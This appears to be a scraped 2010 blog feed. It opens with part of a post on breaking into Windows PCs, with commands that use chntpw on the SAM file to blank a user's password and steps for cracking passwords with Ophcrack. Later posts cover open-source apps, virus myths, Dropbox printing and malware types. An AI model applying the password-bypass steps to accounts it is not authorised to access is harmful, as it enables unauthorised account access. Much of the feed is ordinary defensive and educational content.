&lt;a href=&quot;http://www.howtogeek.com/howto/windows-vista/change-your-forgotten-windows-password-with-the-linux-system-rescue-cd/&quot;&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/a&gt;&lt;br /&gt;
&lt;h2&gt;How it Works&lt;/h2&gt;Just download the .iso file  for the System Rescue Live CD and burn it to disc. Boot from the disc  and hit the default option when the blue screen comes up. After  everything loads and you&#39;re presented with a command-line interface,  type &lt;code&gt;fdisk -l&lt;/code&gt; to see the drives and partitions on your  computer. Pick the Windows partition (usually the largest NTFS  partition) and note the name, e.g. &lt;code&gt;/dev/sda3&lt;/code&gt;.&lt;br /&gt;
Then, run the following command:&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;pre&gt;ntfs-3g /dev/sda3 /mnt/windows –o force&lt;/pre&gt;&lt;pre&gt;&lt;/pre&gt;&lt;/div&gt;Make sure to replace &lt;code&gt;/dev/sda3&lt;/code&gt; with the partition you noted earlier. Next, &lt;code&gt;cd&lt;/code&gt; to your Windows/System32/config directory with this command:&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;pre&gt;cd /mnt/windows/Windows/System32/config&lt;/pre&gt;&lt;pre&gt;&lt;/pre&gt;&lt;/div&gt;We want to edit the SAM file in this folder, so type the following command to get a list of users:&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;pre&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;chntpw –l SAM&lt;/pre&gt;&lt;pre&gt;&lt;/pre&gt;&lt;/div&gt;Note the username you want to access, and then type the following command, replacing &lt;code&gt;Whitson Gordon&lt;/code&gt; with the username in question.&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;pre&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;chntpw –u &quot;Whitson Gordon&quot; SAM&lt;/pre&gt;&lt;pre&gt;&lt;/pre&gt;&lt;/div&gt;At the next screen, choose the first option by typing the number &lt;code&gt;1&lt;/code&gt; and hitting Enter. This will clear the user password, making it blank. When it asks you to write hive files, hit &lt;code&gt;y&lt;/code&gt; and press Enter. It should say OK, and then you can type &lt;code&gt;reboot&lt;/code&gt; to reboot the computer. When you boot into Windows, you&#39;ll be able to log in to that user&#39;s account without a password.&lt;br /&gt;
&lt;h2&gt;How to Beat It&lt;/h2&gt;Once again, the weakness of this method is that it still can&#39;t beat  encryption. Changing the password will disallow you access to those  encrypted files,  makes this method pretty useless. If they&#39;ve only encrypted a few  files, though, you&#39;ll still be able to access all the unencrypted stuff  without a problem.&lt;br /&gt;
&lt;h1&gt;&amp;nbsp;&lt;/h1&gt;&lt;h1&gt;Brute Force: Crack the Password with Ophcrack&lt;/h1&gt;Where the other two methods are vulnerable to encryption, this method  will give you full access to everything the user can access, including  encrypted files, since this method relies on finding out the user&#39;s  password instead of bypassing it.&lt;br /&gt;
&lt;h2&gt;How It Works &lt;/h2&gt;All you need to do is download and burn the Ophcrack live CD (use the Vista version if you&#39;re cracking a Windows 7 PC) and boot from  it on your computer. It&#39;ll take a little bit of time to boot, but  eventually it will bring you to a desktop environment and start  attempting to crack passwords. This may take a while. You&#39;ll see the  passwords pop up in the top pane of the window, though, when it finds  them (or, if it doesn&#39;t find them, it&#39;ll notify you). You can then  reboot and log in to Windows using those passwords.&lt;br /&gt;
&lt;h2&gt;How to Beat It&lt;/h2&gt;While this method works on encrypted OSes, it can&#39;t crack every  password out there. To increase your chance of having an uncrackable  password, use something complicated and greater then 14 characters. The stronger your password, the less likely Ophcrack will be able to figure it out.&lt;br /&gt;
&lt;hr /&gt;There are a lot of methods to break into a Windows computer but these are a few of the best and most widely useful. Apart from  encryption, very little can stop the first two methods, and on those  occasions you have Ophcrack to possibly fall back on.Do give your comments.&lt;br /&gt;
&lt;h2&gt;&amp;nbsp;&lt;/h2&gt;</description><link>http://hack-fun.blogspot.com/2010/11/how-to-break-into-windows-pc-and.html</link><author>noreply@blogger.com (Manpreet)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3RcnJsEJDp_wBlCPk_si6ml0f_GfyQ0mU8PA4qN9Q_bEzj9OBvNb446EoCHzfR-uz_TVFTKH4A03a5fzVBt5sLcbXRhavLe3eD0X5jcO5zrx-_wli86KSmAdoG3TJj2n2zAoJuEabNmIf/s72-c/dsc_0005.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3484615790471358750.post-367630762048770589</guid><pubDate>Fri, 08 Oct 2010 15:04:00 +0000</pubDate><atom:updated>2010-11-14T12:57:58.600+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Softwares</category><category domain="http://www.blogger.com/atom/ns#">Windows</category><title>ZeuApp Downloads 82 Awesome Open Source Apps</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQMW6MI-_nlXjWUmypMAQ-5OrjPG_Tour9OgjdPMVW2_qDG-vvcZlgM23urZ0ky3piHgcGfJFxRXzWaZaR5ZNh-M2XyuP_Qv6dOUBNZBsxCTdyj3q43qz0gacpD0NwDYN4RuhZmM230cX7/s1600/z.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;182&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQMW6MI-_nlXjWUmypMAQ-5OrjPG_Tour9OgjdPMVW2_qDG-vvcZlgM23urZ0ky3piHgcGfJFxRXzWaZaR5ZNh-M2XyuP_Qv6dOUBNZBsxCTdyj3q43qz0gacpD0NwDYN4RuhZmM230cX7/s320/z.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
If you&#39;re setting up a new system or helping a friend to see how much great free and open source software exists, ZeuAPP is a portable installation tool for nearly a hundred applications.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
ZeuAPP is essentially an installation dashboard for 82 applications. You can navigate to application types like CD Burners, P2P apps, Office apps, and more. Under each tab are applications for that &lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;category with a &quot;Download&quot; and &quot;Visit Website&quot; button which allow you to download the application and automatically launch the installer or visit the web site for more info.&lt;br /&gt;
&lt;br /&gt;
ZeuAPP is freeware, portable, and Windows only. Looking for something that&#39;ll also quickly grab and install your favorite non-open source apps?&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://blog.zeusoft.net/zeuapp&quot;&gt;Download Zeuapp&lt;/a&gt; &lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;  &lt;/span&gt;</description><link>http://hack-fun.blogspot.com/2010/10/zeuapp-downloads-82-awesome-open-source.html</link><author>noreply@blogger.com (Manpreet)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQMW6MI-_nlXjWUmypMAQ-5OrjPG_Tour9OgjdPMVW2_qDG-vvcZlgM23urZ0ky3piHgcGfJFxRXzWaZaR5ZNh-M2XyuP_Qv6dOUBNZBsxCTdyj3q43qz0gacpD0NwDYN4RuhZmM230cX7/s72-c/z.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3484615790471358750.post-5855423699341653274</guid><pubDate>Thu, 07 Oct 2010 15:46:00 +0000</pubDate><atom:updated>2010-11-14T12:58:29.135+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><title>Nine Common Myths and Misconceptions About Viruses, Examined and Debunked</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg99YxYSIxjjTMs-b-V9LMVJwBmpyI18yxX1Deh3xKhHczL93guKeBOrXy81h8c1ObYhpib_CXrtBilNiCYERtxDsC1F4Zq7UljK3wYFO3JWSETT4lugZTyHFjH9r_yocEq-vWvP4YnVVl/s1600/1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;161&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg99YxYSIxjjTMs-b-V9LMVJwBmpyI18yxX1Deh3xKhHczL93guKeBOrXy81h8c1ObYhpib_CXrtBilNiCYERtxDsC1F4Zq7UljK3wYFO3JWSETT4lugZTyHFjH9r_yocEq-vWvP4YnVVl/s320/1.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
There are so many myths, misconceptions, and just plain old lies about viruses that it&#39;s often hard for anybody to know what to think. Let&#39;s examine a few of the biggest myths about viruses, and debunk each of them.&lt;br /&gt;
&amp;nbsp;&lt;span style=&quot;color: black;&quot;&gt;A few weeks ago, we explained how to understand the difference between viruses, trojans, worms and other malware, &lt;/span&gt;&lt;a href=&quot;http://lifehacker.com/5560443/whats-the-difference-between-viruses-trojans-worms-and-other-malware&quot; style=&quot;color: black;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;/span&gt;&lt;/a&gt; and today we&#39;ll walk through some of the common myths about malware and debunk them.&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style=&quot;font-size: 120%; margin-top: 20px;&quot;&gt;Myth 1: Firewalls Protect You From Viruses&lt;/h3&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH_1DRnSVqDmcWSXUNU3eYETTNfozikUc6yrIWWNn6bg8Ox_0y1gk1i1KEXF2jc1ajJnr5aahDojbR3X9zpFJuNYL3wp75TR6kUymSdGRkK2o7Aml3xCth-vca8F4uKe7ayPW_3z9xNPnt/s1600/2.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;151&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH_1DRnSVqDmcWSXUNU3eYETTNfozikUc6yrIWWNn6bg8Ox_0y1gk1i1KEXF2jc1ajJnr5aahDojbR3X9zpFJuNYL3wp75TR6kUymSdGRkK2o7Aml3xCth-vca8F4uKe7ayPW_3z9xNPnt/s320/2.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 style=&quot;font-size: 120%; margin-top: 20px;&quot;&gt;&amp;nbsp;&lt;/h3&gt;&lt;h3 style=&quot;font-size: 120%; margin-top: 20px;&quot;&gt;I&lt;span style=&quot;font-weight: normal;&quot;&gt;t&#39;s surprising how many people don&#39;t realize this, but your firewall is not going to protect you from a virus, trojan, or spyware—in fact, the only type of malware that you&#39;ll definitely be helping prevent is a worm, because they travel over the network. And sure, theoretically an outbound firewall will alert you when a malware application is sending data back, but that&#39;s a false sense of security, since once you are infected, a clever virus can simply &lt;/span&gt;&lt;i style=&quot;font-weight: normal;&quot;&gt;disable the firewall&lt;/i&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;. Don&#39;t misunderstand, we aren&#39;t recommending that you go and disable your firewall—in fact you should keep it enabled at all times, especially when you&#39;re on an insecure network like a coffee shop. If you aren&#39;t sure what firewall to choose, we recommend you don;t pay for windows security and use the built-in one,&lt;/span&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt; but you can also check out our list of the best windows firewalls.&lt;/span&gt;&lt;/h3&gt;&lt;h3 style=&quot;font-size: 120%; margin-top: 20px;&quot;&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/h3&gt;&lt;h3 style=&quot;font-size: 120%; margin-top: 20px;&quot;&gt;Myth 2: Viruses Can Physically Damage Your Hardware&lt;/h3&gt;&lt;h3 style=&quot;font-size: 120%; font-weight: normal; margin-top: 20px;&quot;&gt;&lt;/h3&gt;&lt;h3 style=&quot;font-size: 120%; font-weight: normal; margin-top: 20px;&quot;&gt;Sure, a virus like CIH can infect your firmware or BIOS, but the hardware itself is unaffected. Rumors of viruses causing your PC to go crazy and explode are unfounded and a little ridiculous. If your computer ends up infected by one of these more dangerous BIOS-level viruses, you&#39;ll probably have to take the computer to somebody that can wipe the BIOS manually, or replace it, but software viruses aren&#39;t going to murder your hardware.&lt;/h3&gt;&lt;h3 style=&quot;font-size: 120%; font-weight: normal; margin-top: 20px;&quot;&gt;&amp;nbsp;&lt;/h3&gt;&lt;h3 style=&quot;font-size: 120%; margin-top: 20px;&quot;&gt;Myth 3: My Computer Is Throwing a Lot of Errors, So It Must Have a Virus&lt;/h3&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho11TqaAqHqaKkI7Hxr14YhTeP-m86zk5XwY-thHDQtAfZ54px5JHh1BttssV7FsBb2PMBA0tS5f-4u9yypSGk8KIn1JYR1xdUA2YM8Aio8qPHJIEwh-kZaJIWTQK-udKpwbPJSgjEG4wR/s1600/3.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;80&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho11TqaAqHqaKkI7Hxr14YhTeP-m86zk5XwY-thHDQtAfZ54px5JHh1BttssV7FsBb2PMBA0tS5f-4u9yypSGk8KIn1JYR1xdUA2YM8Aio8qPHJIEwh-kZaJIWTQK-udKpwbPJSgjEG4wR/s320/3.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;h3 style=&quot;font-size: 120%; font-weight: normal; margin-top: 20px;&quot;&gt;&amp;nbsp;Files can get corrupted on their own, without the involvement of any viruses—whether it&#39;s through a bug in the software, a bad sector on your hard drive, faulty memory, or ironically, a conflict with your antivirus software. So the next time you get a warning about being unable to open a file, scan it with your antivirus software before you accuse your computer of having a virus.&lt;/h3&gt;&lt;h3 style=&quot;font-size: 120%; font-weight: normal; margin-top: 20px;&quot;&gt;&amp;nbsp;&lt;/h3&gt;&lt;h3 style=&quot;font-size: 120%; margin-top: 20px;&quot;&gt;Myth 4: I Can Just Reinstall Windows and Copy Everything Back&lt;/h3&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&amp;nbsp;I can&#39;t count the number of times I&#39;ve seen somebody reinstall Windows on their PC after a virus infection, only to copy their files from a backup drive and then re-infect themselves all over again. You need to make sure that your documents and data have been scanned for and are free from viruses, especially after an infection.&lt;br /&gt;
To help prevent these problems in the first place, make sure that you&#39;ve got an antivirus package installed and real-time protection enabled. If you aren&#39;t sure which one to choose, we recommend the free Microsoft Security Essentials, but if you want to shop around, take a look at one of the Popular antivirus applications&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style=&quot;font-size: 120%; margin-top: 20px;&quot;&gt;Myth 5: I Can Always Trust My Antivirus Application to Steer Me in the Right Direction&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/h3&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirOrBQM5YksZMJ6MT2BOzrMPi_XvEW9LXFq1JuW9asXSjosnCQEICF87P9HBwoW6zQL32AGMi5jsMThyiD3nLQVvE1lmXgBj4iMxuX_G9_CZS3w20JsgsKTNXm50Oo-_4oB1u19AkdQpN4/s1600/4.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;128&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirOrBQM5YksZMJ6MT2BOzrMPi_XvEW9LXFq1JuW9asXSjosnCQEICF87P9HBwoW6zQL32AGMi5jsMThyiD3nLQVvE1lmXgBj4iMxuX_G9_CZS3w20JsgsKTNXm50Oo-_4oB1u19AkdQpN4/s320/4.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
More often than you&#39;d think, your antivirus software is just plain wrong, and especially when you&#39;re using a scanner that employs heuristic scanning to check if a file &lt;i&gt;might&lt;/i&gt; have a virus. Do you remember the recent Mcafee fiasco?&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style=&quot;font-size: 120%; margin-top: 20px;&quot;&gt;Myth 6: The Blue Screen of Death Means I&#39;ve Got a Virus, Right?&lt;/h3&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2r4D91q0Vzr-IAoJg9IkgvCRri8GWCeGqB4CMLsWRu9PUxkgDaCkUHDjzwET_mvA8mlZ9RjqXKQNSNBtYJegAhmafPa5tJOakUvWNqkv3s1VVOmazDOiEJGIcJ-ceIHAO4p3M0z5dzfFM/s1600/5.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;129&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2r4D91q0Vzr-IAoJg9IkgvCRri8GWCeGqB4CMLsWRu9PUxkgDaCkUHDjzwET_mvA8mlZ9RjqXKQNSNBtYJegAhmafPa5tJOakUvWNqkv3s1VVOmazDOiEJGIcJ-ceIHAO4p3M0z5dzfFM/s320/5.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
While some viruses can certainly cause an appearance by the feared blue screen of death, the majority of the time a BSOD is caused by bad drivers or faulty hardware. It&#39;s very rarely a virus, and assuming that it is will increase your troubleshooting time. &lt;br /&gt;
Your best bet when dealing with the blue screen of death is to disable the automatic reboot so you have time to write down the error message. Once you&#39;ve done so, chances are good that Google will help you out with an answer to what it could be.&lt;span style=&quot;font-weight: normal;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-weight: normal;&quot;&gt; &lt;/span&gt;&lt;br /&gt;
&lt;h3 style=&quot;font-size: 120%; margin-top: 20px;&quot;&gt;Myth 7: Windows Is the Only Platform with Malware&lt;/h3&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig3UBZ3YNOPms8VgwK0OZ5JiKOFq5C5osGPZ_vnM5Jj708EAr36jvr1zg-ZgHjg_fhmXJG5WsQrAR7SxH18Z9HfI28NtMEKiFZyG6uo1xMPTB_V3qHI7O-7K10iRogA1ke_anzS_4bwF2O/s1600/6.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;152&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig3UBZ3YNOPms8VgwK0OZ5JiKOFq5C5osGPZ_vnM5Jj708EAr36jvr1zg-ZgHjg_fhmXJG5WsQrAR7SxH18Z9HfI28NtMEKiFZyG6uo1xMPTB_V3qHI7O-7K10iRogA1ke_anzS_4bwF2O/s320/6.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
hile it&#39;s true that almost all viruses are targeted at Windows, it doesn&#39;t mean that Windows is the only platform with malware issues. There&#39;s been a recent increase in trojans targeting Macs, usually through pirated software cracks(same as Windows), and the trend will probably continue as Macs become more popular. And since trojans exploit human error rather than a security hole, all platforms are susceptible to them. &lt;br /&gt;
If you&#39;re using a Linux or Mac computer, you can protect yourself by following many of the same rules that you would for Windows: Don&#39;t install software from places you don&#39;t know, be wary anytime a piece of software asks you for your password, and avoid installing &quot;codecs&quot; from porn sites. Some simple common sense will keep you from being the victim of a malware attack&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style=&quot;font-size: 120%; margin-top: 20px;&quot;&gt;Myth 8: This Damn Virus Went Browsing for Porn—It Wasn&#39;t Me! &lt;/h3&gt;I always get a good laugh when somebody brings a PC over to me and tells me that it&#39;s infected with viruses—and then they proceed to tell me that those darn viruses opened up all these sleazy porn sites, and they have no idea how it happened. If you&#39;ve spent any time in the tech help world, you&#39;ve probably heard the same thing before.&lt;br /&gt;
Sure, you might accidentally see a porn ad popup if you don&#39;t have a popup blocker in your browser and you&#39;re already browsing sleazy sites, but viruses don&#39;t browse through porn sites, people do. It&#39;s usually at this stage that I point out that just like the people on the screen, anything downloaded from a porn site is much more likely to contain a virus.&lt;br /&gt;
&lt;h3 style=&quot;font-size: 120%; margin-top: 20px;&quot;&gt;Myth 9: Viruses Can Infect Humans, or Alien Spacecrafts&lt;/h3&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjfRaj91xUjoz2FsUYuzbRVZ_telMPZGNmGDIGjnN5chRtHTkY805fwPc3DIxbvDkk_MH8tc_3YHFidDLgVJfTIZsiNdQzMbGMBIKI7FB0kMMu0h2xnBzK4fNz34QOv9ZhEoziLpXgN-8f/s1600/7.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;168&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjfRaj91xUjoz2FsUYuzbRVZ_telMPZGNmGDIGjnN5chRtHTkY805fwPc3DIxbvDkk_MH8tc_3YHFidDLgVJfTIZsiNdQzMbGMBIKI7FB0kMMu0h2xnBzK4fNz34QOv9ZhEoziLpXgN-8f/s320/7.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Yeah, so this one is a little ridiculous, but there are just too many movies and TV shows that have a plot dependent on the idea of humans infecting an alien spacecraft with a virus that spreads from one ship to another, until it finally infects the mothership and kills them all. I mean, &lt;i&gt;really?&lt;/i&gt; Is that the best plot they can come up with? We can barely even share files between Macs and PCs without problems, much less infect a human being or an alien spacecraft with a virus. To quote Chef: &quot;That doesn&#39;t make any goddamned sense!&quot; &lt;br /&gt;
.&lt;br /&gt;
&lt;span style=&quot;font-weight: normal;&quot;&gt; &lt;/span&gt;</description><link>http://hack-fun.blogspot.com/2010/10/nine-common-myths-and-misconceptions.html</link><author>noreply@blogger.com (Manpreet)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg99YxYSIxjjTMs-b-V9LMVJwBmpyI18yxX1Deh3xKhHczL93guKeBOrXy81h8c1ObYhpib_CXrtBilNiCYERtxDsC1F4Zq7UljK3wYFO3JWSETT4lugZTyHFjH9r_yocEq-vWvP4YnVVl/s72-c/1.jpg" height="72" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3484615790471358750.post-6579200730539525439</guid><pubDate>Fri, 01 Oct 2010 15:31:00 +0000</pubDate><atom:updated>2010-10-01T21:02:54.267+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Tricks</category><title>Print Files on Your Printer from Any Phone or Remote Computer via Dropbox</title><description>&lt;object height=&quot;385&quot; width=&quot;530&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/x4TuXBNqksY?fs=1&amp;amp;hl=en_US&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowscriptaccess&quot; value=&quot;always&quot;&gt;&lt;/param&gt;&lt;embed src=&quot;http://www.youtube.com/v/x4TuXBNqksY?fs=1&amp;amp;hl=en_US&quot; type=&quot;application/x-shockwave-flash&quot; allowscriptaccess=&quot;always&quot; allowfullscreen=&quot;true&quot; width=&quot;530&quot; height=&quot;385&quot;&gt;&lt;/embed&gt;&lt;/object&gt; &lt;br /&gt;
&lt;br /&gt;
Punjabi Hacker details how to combine a Dropbox account and a simple script with any device that supports Dropbox (which includes almost all popular smartphones and Windows/Mac/Linux operating systems) to remotely or wirelessly print documents on your home printer. &lt;br /&gt;
The video above demonstrates the script in action, but the four-step setup is pretty simple. The short version: 1) Install Dropbox on the computer connected to your printer, 2) make sure Dropbox is also installed on the device you want to print from (or set up an email-to-Dropbox service) 3) run the VBS script on the printer-connected computer (available at Digital Inspiration) to create and monitor a PrintQueue folder in your Dropbox folder, and 4) send any file you want printed to the PrintQueue folder.</description><link>http://hack-fun.blogspot.com/2010/10/punjabi-hacker-details-how-to-combine.html</link><author>noreply@blogger.com (Manpreet)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3484615790471358750.post-6945516453104401049</guid><pubDate>Tue, 21 Sep 2010 15:28:00 +0000</pubDate><atom:updated>2010-09-21T21:02:39.037+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><title>What’s the Difference Between Viruses, Trojans, Worms, and Other Malware?</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkn_3iAq48ow2pqSKAHjKtyxk6Espv0UrFN17yKEY4QFwIHxNFJp2beMOks71HmpotpeMyANH0Ym7Fi7dYcWiV55-ViV-O9XKF_KgngGBJDhG7PNdaxIRIO1faazs3jhwa8vTrLThAK0A_/s1600/500x_sshot-2010-06-10-1-14-56-26.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkn_3iAq48ow2pqSKAHjKtyxk6Espv0UrFN17yKEY4QFwIHxNFJp2beMOks71HmpotpeMyANH0Ym7Fi7dYcWiV55-ViV-O9XKF_KgngGBJDhG7PNdaxIRIO1faazs3jhwa8vTrLThAK0A_/s320/500x_sshot-2010-06-10-1-14-56-26.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Punjabi Hacker&#39;s tech-savvy readers are the first people on speed-dial when it&#39;s time to heal an infected PC, but how much do you &lt;i&gt;really&lt;/i&gt; know about viruses, spyware, scareware, trojans, and worms? Here&#39;s a helpful guide to understanding all the different types of malware.  &lt;br /&gt;
The point of today&#39;s lesson, of course, is to help you teach your friends and family more about the different types of malware, and debunk a few of the common myths about viruses. Who knows, maybe you&#39;ll learn a thing or two as well.&lt;br /&gt;
&lt;h3 style=&quot;font-size: 120%; margin-top: 20px;&quot;&gt;What is Malware?&lt;/h3&gt;The word Malware is short for &lt;i&gt;malicious software&lt;/i&gt;, and is a general term used to describe all of the viruses, worms, spyware, and pretty much anything that is specifically designed to cause harm to your PC or steal your information.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjtW8I-Llxrp5sIY1JlEizlSlszz_mVwfNzJ2Ls6Mc9s9kG8EJDZT1y-_-rZj6JB3ERBV9bHf5kuQToYiIcZs5V_x9LfmR332605fsF-x7T29rHHcN7T9p_Wmn5vIW4ZN3eOJlDBhrVLN9/s1600/500x_sshot-2010-06-10-1-15-03-11.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjtW8I-Llxrp5sIY1JlEizlSlszz_mVwfNzJ2Ls6Mc9s9kG8EJDZT1y-_-rZj6JB3ERBV9bHf5kuQToYiIcZs5V_x9LfmR332605fsF-x7T29rHHcN7T9p_Wmn5vIW4ZN3eOJlDBhrVLN9/s320/500x_sshot-2010-06-10-1-15-03-11.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
The term &lt;i&gt;computer virus&lt;/i&gt; is often used interchangeably with &lt;i&gt;malware&lt;/i&gt;, though the two don&#39;t actually have the same meaning. In the strictest sense, a virus is a program that copies itself and infects a PC, spreading from one file to another, and then from one PC to another when the files are copied or shared. &lt;i style=&quot;color: black;&quot;&gt;Image by &lt;a href=&quot;http://www.flickr.com/photos/joffley/135052908/&quot;&gt;Joffley&lt;/a&gt;&lt;/i&gt; &lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;Most viruses attach themselves to executable files, but some can target a master boot record, autorun scripts, MS Office macros, or even in some cases, arbitrary files. Many of these viruses, like &lt;/span&gt;&lt;a href=&quot;http://en.wikipedia.org/wiki/CIH_%28computer_virus%29&quot; style=&quot;color: black;&quot;&gt;CIH&lt;/a&gt;, are designed to render your PC completely inoperable, while others simply delete or corrupt your files—the general point is that a virus is designed to cause havoc and break stuff.&lt;br /&gt;
